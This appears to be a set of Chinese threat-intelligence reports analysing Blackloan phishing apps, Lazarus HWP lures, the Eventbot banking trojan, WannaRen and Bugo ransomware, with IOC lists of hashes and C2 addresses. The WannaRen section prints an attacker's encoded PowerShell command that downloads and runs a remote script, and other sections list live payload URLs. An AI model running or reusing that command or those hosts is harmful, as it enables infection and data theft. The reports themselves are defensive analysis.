MD5 A13B3A0E161D0BF9FA1D80F56352A0AE
图标

Blackloan代码结构:

通过钓鱼页面诱骗用户填写个人信息:

数据包,返回获取到的用户信息至http://47.52.158.74

代码分析

获取用户个人信息并进行上传,从而进行深入攻击:

获取用户位置:

获取短信:

获取通讯录:

发送获取到的用户信息至服务端:

http://62.60.134.177:7703/app/input.php

扩展分析

Blackloan此次主要仿冒的图标信息:

本次我们捕获了同源样本26个,通过对比包名我们发现,该类钓鱼APP可能只是测试样本,恶意APP本次只是伪装了应用名,包名还没有进行伪装。而最早的样本出现在2020年2.26日,所以恶意APP后续还可能进行更新。

通过分析我们发现Blackloan此次的26个样本中,基本每个样本都有其单独的服务器,虽然Blackloan出现的时间并不长,且样本都可能处于测试阶段,但其团伙投入可谓不小。

我们通过分析发现了其服务端的登录页面,登陆页面都是清一色的使用了繁体中文,从行为习惯上分析,攻击者可能和台湾电信诈骗团伙有一定的关联。

近年来关于台湾对内地电信诈骗的新闻,其中很多受害者为国内用户,近年来发生的案件也比较多:

东南亚诈骗近年来也尤为严重:

总结

Blackloan由于出现的时间并不长,且样本可能处于测试阶段,所以在国内并没大规模传播,但国内也已经有用户中招。奇安信病毒响应中心提醒广大用户,不要随意安装来源不明的APP,如果遇到需要填写个人敏感信息的情况,请提前联系相应的官方客服进行确认。

目前奇安信威胁情报中心文件深度分析平台:(https://sandbox.ti.qianxin.com/sandbox/page)已支持Android样本分析:

同时基于奇安信威胁情报中心的威胁情报数据的全线产品,包括奇安信威胁情报平台(TIP)、天擎、天眼高级威胁检测系统、奇安信NGSOC等,都已经支持对此类攻击的精确检测。

IOC

MD5

5BC922612EF826F95D5CF46697292B82

EF3619529B507C53BD701A9207B40550

A13B3A0E161D0BF9FA1D80F56352A0AE

2CAACAB9C2B9BB606122E723FF64CE8B

7B2919DDD83F51949498CCA86A4A9C75

F61A8F344742F254515459E91642474B

406C593395231091741392BBC21903E4

1D7693846A33AF7084D9A94310538A5A

C01DB2337BE8E5E18231F74AA35D32C6

C21EAFD3EA3B905D8**0D1475FF78A68

2B03E1B08B88752DDFF026F58798A729

77F69C60B61E438A282191B1E4AFEE9D

6A1F47322748CA2E695635945DCFB478

161455A0024DF8525BCE039C90222FA5

BAF4A416E531F25B9FB917D3629F157D

0AC3DA0DBC34E9E67F2E49769BA04416

A28D84F43F30B017C8296A127CB1D45C

806276355682CF281B5A1598E0D1D88B

4A6096174B06124B51E1C08723827D65

D653129352A69917808D6B00C3DEDAA9

68C3C7540118446DB3DDB6391B1072DA

C785262B78DD947B2094DE506F7DBECE

D2F691E53E69863DE4CA903C2B43AE23

EF3619529B507C53BD701A9207B40550

8AE41E4258FD7FE550B1A1FFC080174B

6E8B39E0**46C160251B9928615B8678

E2E1FAFA30CDEFA2E017FAA54C28CE1A

C2

http://47.52.158.74

http://62.60.134.177

http://024113vn.com/

http://213.176.61.9:9002

http://140.82.34.185

http://45.77.225.48/

http://45.63.98.87/

http://213.176.36.42:4206

http://bocongan113vn.com

http://213.176.61.9:9002

http://bocongan113vn.com/

http://213.176.36.42/

http://213.176.60.234:3403

http://213.176.61.9:9004

http://www.gov-cbminfo.com

http://213.176.36.42:4205

http://45.63.98.87

http://www.vn84pd.com

http://155.138.161.5

http://www.gov-cbminfo.com

http://213.176.36.42:4205

http://213.176.61.9:9004

http://8425113.com

http://62.60.134.219:1903

http://www.negaramy-bank.com

http://213.176.36.42:4202

http://213.176.36.42:4205

http://www.gov-cbminfo.com

http://8425113.com

http://62.60.134.219:1903

http://www.gov-cbminfo.com

http://213.176.36.42:4205

http://213.176.60.234:3401

http://62.60.134.177:7701

http://213.176.36.42:4203

http://213.176.61.9:9001

http://213.176.36.42:4207

*本文作者:奇安信威胁情报中心,转载请注明来自FreeBuf.COM

背景

Lazarus是疑似具有东北亚背景的APT组织,因2014年攻击索尼影业开始受到广泛关注,其攻击活动最早可追溯到2007年,该组织早期主要针对其他国家政府机构,以窃取敏感情报为目的。但自2014年后,该组织开始针对全球金融机构 ,虚拟货币交易场等为目标,进行以敛财为目的的攻击活动。

近日,奇安信威胁情报中心红雨滴团队在日常的异常样本监控过程中捕获到多例该团伙利用疫情为诱饵攻击周边国家的样本。定向攻击使用某国地区特有的HWP文档并伪装为韩国仁川疾控中心的邮件进行投递,具有极强的针对性。红雨滴团队在发现此次攻击活动的第一时间向安全社区进行预警。

样本分析

HWP文档释放DLL后门的攻击样本

文件名 인천광역시 코로나바이러스 대응 긴급 조회 .hwp
MD5 bc13fc599bb594bc19ac9e6fde0c28c6

攻击者伪装为韩国仁川疾控中心发送了带有恶意HWP文档附件的定向攻击邮件:

以疫情相关信息诱导受害者执行附件文档,附件文档名为:인천광역시 코로나바이러스대응긴급조회.hwp(仁川广域市紧急调查冠状病毒)。HWP文档打开后会展示疫情相关诱饵信息:

通过hwpscan2工具打开文件,可见样本信息如下:

样本中包含Post Scrip脚本,执行文档后,该脚本将会释放到%temp%目录下,并通过HWP组件gbb.exe加载起来。HWP文件中的大部分流都是经过zlib raw deflate压缩存储的,EPS流也不例外。可以通过Python解压缩恶意HWP文件中的EPS流,最终提取的脚本信息如下:

脚本将执行image中定义的shellcode,多层解密后如下所示:

可见该脚本最终将执行PowerShell脚本,脚本将根据系统位数的差别从远程下载对应文件到%temp%skype.jpg,并利用regsvr 32加载skype.jpg:

文件名 Skype.exe
MD5 e3ef607182564bb158287cafb7b11be7
来源 http://teslacontrols.ir/wp-includes/images/detail31.jpg

下载的文件是一个DLL文件,加载起来后首先动态获取API:

之后获取系统版本,并根据不同版本尝试打开对应文件,从而判断当前进程权限以及进程id是否相同:

若无法获取对应文件句柄或进程id不对应,则提升自身权限,并将自身注入到对应的文件中执行:

满足条件后,检查运行环境,是否处于虚拟机中,若是虚拟机则退出程序:

检查是否处于被调试状态

通过检查窗口名,检查是否存在IDA等相关分析工具:

之后获取计算机用户名,MAC地址等信息:

将获取的信息加密后与C2通信获取命令执行等相应功能:

该样本具有下载执行、获取进程列表、上传文件、获取计算机信息等功能:

HWP文档释放EXE后门的攻击样本

奇安信红雨滴团队还捕获了另外一起利用相同诱饵,相同手法的攻击样本

文件名 전라남도 코로나바이러스 대응 긴급 조회.hwp
MD5 8451be72b75a38516e7ba7972729909e

该样本诱饵与之前的样本一样,执行后同样通过EPS脚本执行PowerShell从远程获取可执行文件执行:

远程获取的可执行文件信息如下:

文件名 Svchost.exe
Md5 fe2d05365f059d48fd972c79afeee682
来源 http://www.sofa.rs/wp-content/themes/twentynineteen/sass/layout/h1.jpg

该样本加入大量花指令,干扰分析:

样本会获取计算机MAC地址、硬盘ID等信息:

木马程序还会试着读取%AppData%\\Mircosoft\\Windows\\Winx\\config.txt中的文本,该文件会存放着加密后的URL地址:

若该文件为空或不存在,则初始化C2并加密存入config.txt

之后与C2通信获取指令执行:

该样本通过自定义功能几个类实现恶意功能,包括远程SHELL、获取文件信息、键盘记录、下载执行等功能:

总结

Lazarus团伙是一个长期活跃的APT组织,其网络攻击武器库十分强大,拥有对多平台进行攻击的能力。近年来,该团伙多次被安全厂商披露,但从未停止进攻的脚步,反而越发活跃,攻击目标也越发广泛。同时,该团伙也多次针对中国国内进行攻击活动,所以企业用户在日常的工作中,切勿随意打开来历不明的邮件附件和链接。

目前,基于奇安信威胁情报中心的威胁情报数据的全线产品,包括奇安信威胁情报平台(TIP)、天擎、天眼高级威胁检测系统、奇安信NGSOC、奇安信态势感知等,都已经支持对此类攻击的精确检测。

IOC

MD5

8451be72b75a38516e7ba7972729909e

bc13fc599bb594bc19ac9e6fde0c28c6

4662dfa19bd590b1088befa28426a161

b5a31d89f5b83d37c921d159364c968c

e6521be3b323865cf05f27d7c43aeff2

URL

http://www.sofa.rs/wp-content/themes/twentynineteen/sass/layout/h1.jpg

hxxp://teslacontrols.ir/wp-includes/images/detail31.jpg

hxxp://teslacontrols.ir/wp-includes/images/detail32.jpg

http://www.kingsvc.cc/index.php

http://www.sofa.rs/wp-admin/network/server_test.php

http://www.afuocolento.it/wp-admin/network/server_test.php

http://www.mbrainingevents.com/wp-admin/network/server_test.php

*本文作者:奇安信威胁情报中心,转载请注明来自FreeBuf.COM

背景介绍

2020年无疑是多灾多难的一年,虽然时间目前只过去了四分之一。但借着“新冠肺炎”各种衍生的自然灾难、人为灾难接踵而至。

近期奇安信病毒响应中心在日常监测中,发现了一种新的移动银行木马Eventbot,其最早可以追溯到2020年3月1日。Eventbot使用了全新的代码结构,与目前已知的银行木马完全不同。经过分析我们发现Eventbot目前可能只是处于测试阶段,其繁琐的功能以及影响的金融应用众多。目前其主要针对欧洲一些国家的银行应用、一些加密货币钱包应用等共234个(见附录)

Eventbot样本信息:目前发现的样本,其都使用相同的包名com.example.eventbot,代码功能也不够完善,并且代码并没有经过混淆加密处理,因此我们推断其正处于测试阶段。根据我们对样本的溯源,发现其最早出现在2020年3月1日。

样本分析

Eventbot其功能繁多,相比于近期比较活跃的Cerberus、Anubis、Joker等毫不逊色。

样本信息

应用名 Flash Update
包名 com.example.eventbot
MD5 F73F66B15791A42DAC86D0CED46D660F
图标

运行截图:

样本功能

Eventbot木马通过仿冒正常应用图标诱骗用户安装使用,其运行以后会通过仿冒升级更新,隐藏自身图标达到保护自身。Eventbot木马通过Accessibility Service功能实施对用户手机的监控,恶意功能多达50多种。其运行后会通过服务端下发指令,实施对用户手机的操控,例如:获取并上传用户手机短信,获取并上传用户手机配置信息,获取并上传用户手机已安装应用,对用户手机浏览器进行注入,启动用户手机指定APP,删除指定应用,更新恶意插件等恶意行为。

代码分析

获取C2:

通过服务端下发指令:

获取并上传用户手机短信:

操控用户手机:

上传用户信息:

数据包:

影响分析

Eventbot主要以金融行业为目标,通过分析我们发现目前其影响了英国、德国、意大利、西班牙等国的十来家银行APP,总共影响234个金融APP,尤其以虚拟货币交易平台为主。

Eventbot仿冒的主要图标:

Eventbot影响的金融行业APP图标举例:

从中我们可以看到,Eventbot主要以虚拟货币交易平台为主要目标,虽然国内早已经关闭了虚拟货币的交易,但依然有很多人通过“科学上网”,通过一些虚拟货币交易平台在进行买卖,其中很大一部分平台APP在Eventbot的目标之中,这些无疑增加了国内用户手机中招的概率。

总结

进入2020年以后,Android银行木马随着“新冠肺炎”的爆发变得异常活跃,继Cerberus、Anubis木马之后,又出现了全新的木马Eventbot。虽然目前Eventbot木马只是处于测试阶段,实质性的危害还没有扩大,但其潜在的影响广泛,对国内一些进行虚拟货币交易的用户具有潜在的威胁。奇安信病毒响应中心会随时关注相关木马的实时动态,同时奇安信病毒响应中心提醒用户不要安装未知来源的APP,同时提高个人的安全意识。

目前奇安信威胁情报中心文件深度分析平台:(https://sandbox.ti.qianxin.com/sandbox/page)已支持Android样本分析:

同时基于奇安信威胁情报中心的威胁情报数据的全线产品,包括奇安信威胁情报平台(TIP)、天擎、天眼高级威胁检测系统、奇安信NGSOC等,都已经支持对此类攻击的精确检测。

IOC

文件MD5:

7107AC3BCCD8DB274B21F0E494E3ECCC

8A563B6AF3CF74C8CBB88B99E104D949

F73F66B15791A42DAC86D0CED46D660F

7F5D728119951839B46895808107B281

B3F4746A6C21D030D2B73FF2AC3CEC2F

66AE6BB78ED76B252C2EA6EC8072B0E8

664118A72533D9A0D60E9CABA439FE28

E1229D332CA43AC2B640084A0DAE9BBE

8793359481AB88914B5E60625F57277C

36988753860CD9F919B9D2A94C0AF0FC

C2:

http://themoil.site/gate_cb8a5aea1ab302f0_c

http://ora.carlaarrabitoarchitetto.com/gate_cb8a5aea1ab302f0_c

http://ora.studiolegalebasili.com/gate_cb8a5aea1ab302f0_c

附录

受影响的234家金融机构应用包名:

包名 包名 包名列3
com.ownrwallet.wallet mobi.societegenerale.mobile.lappli doge.org.freewallet.app
com.aurigaspa.bancadalba it.csebo.fec3mobileProd05772 it.relaxbanking
es.lacaixa.mobile.android.newwapicon com.intesasanpaolo.inbiz com.revolut.revolut
com.tabtrader.android com.sella.BancaSella ftb.ibank.android
it.creval.bancaperta com.opentecheng.android.webank com.wirex
com.plutus.wallet com.kutxabank.android it.cedacri.hb3.crasti
com.grppl.android.shell.BOS com.latuabancaperandroid.ispb com.fideuram.phone
com.cryptotab.android com.cryptoviewer com.coinmarketcap.android
com.mansoon.cryptopop io.cex.app.prod com.latuabancaperandroid
com.jhapps.easyfaucetclaimer it.csebo.fec3mobileProd06150 com.avuscapital.trading212
cedacri.mobile.bank.crbolzano btg.org.freewallet.app clientapp.swiftcom.org
it.bnl.apps.enterprise.hellobank com.payeer it.gruppobper.ams.android.bper
ch.postfinance.android com.conio.wallet app.pay98
co.mona.android it.bnl.apps.banking cash.usdx.wallet
com.chlegou.bitbot com.pundix.xwallet net.bitbay.bitcoin
com.paytomat com.coinninja.coinkeeper com.mediolanum.android.fullbanca
it.csebo.fec3mobileProd05156 com.beeweeb.findomestic com.mercuryo.app
it.cedacri.hb3.crcento it.bper.mobile.mymoney com.mycelium.wallet
it.archie.ccbcarteprepagate com.cryptonator.android uk.co.tsb.businessmobilebank
com.paxful.wallet cedacri.mobile.bank.bppb com.bitpanda.bitpanda
de.postbank.finanzassistent it.bnl.apps.banking.privatebnl mw.org.freewallet.app
com.caisseepargne.android.mobilebanking io.bluewallet.bluewallet com.lloyds.ccdm
com.fullsix.android.labanquepostale.accountaccess uk.co.cumberland.banking.pay2mobile com.wavesplatform.wallet
uk.co.metrobankonline.mobile.android.production com.grppl.android.shell.halifax com.illimity.mobile.rtl
com.arkea.android.application.cmb com.tideplatform.banking com.eofinance
io.eidoo.wallet.prodnet io.kriptomat.app com.enjin.mobile.wallet
it.popso.SCRIGNOapp com.crypterium com.bitnovo.app
com.todo1.mobile.deleteTHIS3 lt.lemonlabs.android.paysera com.starfinanz.smob.android.sfinanzstatus
co.uk.getmondo it.csebo.fec3mobileProd05652 com.unicredit
com.bbva.netcash com.citibank.mobile.au com.ie.vanquis.interact.shell
com.crypto.currency it.chiantibanca.inbank com.swissborg.android.community
it.hype.app com.lloydsbank.businessmobile com.binance.dev
de.schildbach.wallet it.cedacri.hb2.bpbari com.bankofqueensland.boq
com.ecoPayz.appID com.libertex.mobile at.volksbank.volksbankmobile
com.tmobtech.halkbank com.moneybookers.skrillpayments com.lynxspa.bancopopolare
com.tforp.cryptogdx com.mal.saul.coinmarketcap com.plunien.poloniex
com.db.pbc.miabanca io.getdelta.android com.wallet.crypto.trustapp
com.spot.spot com.starlingbank.android com.db.coo.secureauthenticator
com.dowallet com.liberty.jaxx com.barclays.android.barclaysmobilebanking
com.bitcoin.mwallet com.developerdesing.bitcoin fcabank.myfcabank
it.icbpi.mobile ltcc.org.freewallet.app co.edgesecure.app
uk.co.hsbc.hsbcukmobilebanking it.bnl.mybiz com.coinbase.android
com.swftcoin.client.android com.aci.ocean.mobile com.mosync.app_Banco_Galicia
com.monitise.client.android.yorkshire com.coinstats.crypto.portfolio at.paysafecard.android
im.token.app quarecy.crypto com.magnum.wallet
fr.banquepopulaire.cyberplus com.tarjetanaranja.emisor.serviciosClientes.appTitulares it.cabel.mito.mimo.android
com.vipera.chebanca com.touchin.perfectmoney cloud.money.server.mining
co.bitx.android.wallet com.garanti.cepsubesi com.ptpwallet
com.interactive_crypto.app com.monitise.client.android.clydesdale io.atomicwallet
net.inverline.bancosabadell.officelocator.android com.cointiply.earn com.electroneum.mobile
uk.co.tsb.newmobilebank com.polehin.android net.bitstamp.app
hashengineering.darkcoin.wallet uk.co.santander.santanderUK com.syndicomsolutions.ecoinia
com.thanksmister.bitcoin.localtrader eth.org.freewallet.app com.altcoinfantasy.altcoinfantasy
com.bitpie com.kbc.mobilebanking uk.co.bankofscotland.businessbank
it.ingdirect.app pl.bzwbk.bzwbk24 com.tescobank.mobile
ch.raiffeisen.android com.coinomi.wallet de.number26.android
com.ocito.cdn.activity.banquenuger it.nogood.container com.cajaingenieros.android.bancamovil
com.supercrypto.cryptocyrrency com.jdevelops.claimmultifaucet com.moneybookers.skrillpayments.neteller
es.ibercaja.ibercajaapp com.bitrue.currency.exchange lt.spectrofinance.spectrocoin.android.wallet
com.grppl.android.shell.CMBlloydsTSB73 com.monitise.coop exodusmovement.exodus
com.bancsabadell.wallet com.Plus500 app.wizink.es
org.toshi btc.org.freewallet.app com.csg.cs.dnmb
it.copergmps.rt.pf.android.sp.bmps piuk.blockchain.android com.xapo
com.ie.capitalone.uk es.ceca.cajalnet com.commbank.netbank
com.myetherwallet.mewconnect com.advantage.RaiffeisenBank com.mediaengine.allianzbank
com.romerock.apps.utilities.cryptocurrencyconverter it.bancagenerali.mobile com.barclays.bca
com.blockfolio.blockfolio au.com.heritage.app com.tronwallet2
it.gruppocariparma.nowbanking com.niyo.global com.remitano.remitano
it.cartasi.mobilepos com.twogetherbank.app com.bbva.bbvacontigo
com.quppy com.bitpay.wallet com.bankinter.launcher
cobo.wallet co.uk.mycashplus.maapp aib.ibank.android
com.barclaycard.germany io.totalcoin.wallet network.celsius.wallet
com.latuabancaperandroid.pg com.payoneer.android com.crypter.cryptocyrrency
com.changelly.app it.phoenixspa.inbank it.volksbank.android
posteitaliane.posteapp.appbpol com.mirlimited.muchbetter de.commerzbanking.mobil
crypto.aliens.bch com.monese.monese.live cedacri.mobile.bank.hb2.bari
com.CredemMobile com.cmcm.blockchain.bitcoin.ethereum.safewallet com.wrx.wazirx
com.coingecko.coingeckoapp it.iwbank.banking com.nexowallet

*本文作者:奇安信威胁情报中心,转载请注明来自FreeBuf.COM

近日,有网友在社交媒体公开求助,称感染了一款名为WannaRen的新型勒索软件,部分文件被加密,需要支付0.05个比特币(约合2500元)。

部分截图如下:

WannaRen解密器图标伪装Everything。

奇安信病毒响应中心在发现该情况后,第一时间发布了关于该WannaRen的样本解密器分析报告。

WannaRen勒索软件事件分析报告

https://mp.weixin.qq.com/s/pWB1Ex2X6AcSSMIswLizXg

勒索软件的样本解密器截图:

为了进一步补充攻击视角,奇安信威胁情报中心红雨滴团队详细分析事件后,将更多关于该勒索攻击的检测维度公布。

攻击事件分析

根据线索,我们发现于4月2号天擎用户的拦截日志显示

powershell.exe -ep bypass -e

SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0A**AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwBjAHMALgBzAHMAbABzAG4AZwB5AGwAOQAwA**AYwBvAG0AJwApACkA

通过解码发现powershell会去下载并执行cs.sslsngyl90.com的脚本。

实际上该域名会重定向至如下链接。

http://cpu.sslsngyl90.com/vip.txt

从Vip.txt中的脚本可见攻击者会从vim-cn.com图床上下载WINWORD.EXE和wwlib.dll,这种是典型的白加黑攻击手段。通过执行WINWORD.EXE即可加载于同一目录的wwlib.dll。

紧接着wwlib.dll会去加载Public\目录下的you程序,有趣的是,fm文件会记录程序的运行时间,该时间使用简体中文进行记录,因此攻击者是中国人的概率非常大。

该程序需要会使用busahk87909we对you进行解密,解密后在内存加载WannaRen勒索软件

之后的事,跟开头的感染后的症状一致了。

除了上面的勒索情况外,Powershell下载器还具有挖矿功能,其下载后会重命名为nb.exe,其意指中文的**

有趣的是,在事情发酵之后,攻击者删除了脚本中,下载勒索模块的链接,变成了下面这个模块。

我们可以合理的猜测,勒索软件作者都没有料到,就因为他将勒索软件命名为WannaRen,收到了如此大的关注,因此将链接删掉从而试图逃避检测。

然而目前事情居然上了微博热搜,而且阅读量高达1.1亿,只能说当年的WannaCry余威仍在不断散发,攻击者这次是不好跑了。

横向移动功能

从Powershell下载器中可以看到,攻击者会通过图床链接去下载永恒之蓝传播模块。

而office.exe实际上是自解压文件。

此外,该脚本还有一种很少见的横向移动辅助手法,该手法利用了Everything拥有的http服务器功能。

首先,其会在受害器上下载aaaa.exe,并保存到C:\Users\Public\目录下,功能为释放everything并开启http服务器功能,这样在同一内网的其他受害者就可以通过该http服务器下载上面的恶意程序,从而进一步的扩散受害面。

关联分析

通过攻击者的域名,我们发现sslsngyl90.com在1月份奇安信威胁情报中心与就已经将该域名与HideShadowMiner组织的攻击关联在一起,并将域名置黑,因此部署相关情报产品的用户均无遭受此威胁。

HideShadowMiner,国内统称为匿影组织,该组织此前一直进行挖矿攻击,此前国内友商就曾发布过该组织的攻击报告:

http://www.ijinshan.com/info/202003201525.shtml

此外,我们通过特征,发现匿影组织还使用了多个域名搭载同一套Powershell攻击框架发起攻击。

http://us.howappyoude.club/v.txt

http://cpu.goolecpuclan.xyz/vip.txt

相关攻击域名在全网的访问趋势图,时间集中在近期,符合事件发生时段。

除了上面的线索外,还需要注意的是,攻击者会通过微当下载去下载APK程序,并重命名为exe文件,但这也意味着,微当下载并没有识别出该APK是恶意的PE程序并进行了放行,这对于攻击者来说是一个非常好利用的资源。

微当下载的软件提交方式

总结

万幸的是,虽说整个攻击过程都被奇安信分析人员解析清楚,但是由于在2020年4月2奇安信天擎就已经检测并执行Powershell攻击的行为,因此奇安信的用户无一中招。

此外,退一万步说,即使Powershell执行起来了,但是对应的勒索病毒模块同样被天擎查杀。

奇安信红雨滴团队提醒广大用户,及时备份重要文件,更新安装补丁,切勿打开社交媒体分享的来历不明的链接,不点击执行未知来源的邮件附件,不运行夸张的标题的未知文件,不安装非正规途径来源的APP。

我们提供了IOC,以供用户自查。

IOC

cpu.sslsngyl90.com/xx.txt

cpu.sslsngyl90.com/wmi.txt

us.howappyoude.club/v.txt

cpu.goolecpuclan.xyz/vip.txt

xx.sslsngyl90.com

xx.sslsngyl90.com

wmi.sslsngyl90.com

wmi.sslsngyl90.com

d.sslsngyl90.com

cs.sslsngyl90.com

cpu.sslsngyl90.com

sslsngyl90.com

相关恶意程序下发路径

C:\ProgramData\227.exe

C:\ProgramData\office.exe

C:\ProgramData\nb.exe

C:\ProgramData\WinRing0x64.sys

C:\ProgramData\officekms.exe

C:\ProgramData\xeexfrt.txt

C:\Users\Public\MicrosftEdgeCP.exe

C:\Users\Public\1\winlogtrf.exe

C:\ProgramData\227.txt

C:\Users\Public\ aaaa.exe

C:\Users\Public\you

C:\ProgramData\wwlib.dll

WannaRen勒索软件主体Hash

9854723bf668c0303a966f2c282f72ea

*本文作者:奇安信威胁情报中心,转载请注明来自FreeBuf.COM

概述

近日,奇安信病毒响应中心在日常样本监控过程中发现一款新型勒索病毒在地下论坛上被售卖,贩卖者宣称该加密软件性能高,速度快,可自定义联系方式和加密后缀。

该勒索软件由Golang语言开发,执行过程中会将其自身复制到特定目录下并启动,接着生成AES密钥,遍历目录获取文件,加密文件,自删除、弹出勒索信。结合样本相关特征奇安信病毒响应中心将其命名为Bugo勒索家族。

由于该勒索还处于贩卖阶段,还未能大范围流行,奇安信已将此威胁扼杀在摇篮里,并对相关信息进行披露。

背景

最近一段,通过奇安信大数据平台检测,国内外越来越多的恶意软件开发者开始使用Golang语言来开发远控、勒索软件等恶意软件。

在前一阵的通达OA事件中,攻击者就使用了Golang编写的勒索软件,通过伪装成通达OA的某个插件的方式植入相关企业的电脑中,成功绕过杀软软件,加密企业数据,给相关企业造成了较大的损失。

本次捕获的新型勒索软件“Bugo”目前正在地下论坛中出售。卖方称可以自定义联系方式和加密后缀。

这意味着,相关黑产团伙购买后可以无限制的生成任意加密后缀的勒索样本,如果考虑极致的免杀还可以在外层套几层流行的混淆器再进行投放,危害巨大。同时在该论坛中,有人在寻求Arkei Stealer logs工具,用于勒索软件的攻击流程中。

样本分析

整体流程如下:

将自身拷贝到%temp%目录下,调用CMD启动

随机生成AES密钥并加载RSA公钥,使用RSA公钥加密AES密钥,作为用户ID

遍历目录

排除如下目录

C:\PerfLogs

C:\Program Files

C:\Program Files (x86)

C:\Windows

加密的文件后缀类型如下

加密文件,后缀为.[[email protected]].bug

之后自删除,弹出勒索信

总结

经过测试Bugo勒索家族免杀效果较好,能够绕过国内绝大多数的杀软,另一方面代码结构短小精悍,加密速度非常快,不到五分钟就可以全盘加密。因此,奇安信病毒响应中心提醒用户,疫情在家远程办公,不要点击来源不明的邮件和可执行文件,同时提高个人的安全意识,从而可以防止用户隐私信息被盗取的风险,奇安信病毒响应中心会持续对新型勒索软件进行监控和跟踪。

同时基于奇安信威胁情报中心的威胁情报数据的全线产品,包括奇安信威胁情报平台(TIP)、天擎、天眼高级威胁检测系统、奇安信NGSOC等,都已经支持对该家族的精确检测。

IOC

文件Hash:

dd3f0bd96b1982bb57542f02695ec257

*本文作者:奇安信威胁情报中心,转载请注明来自FreeBuf.COM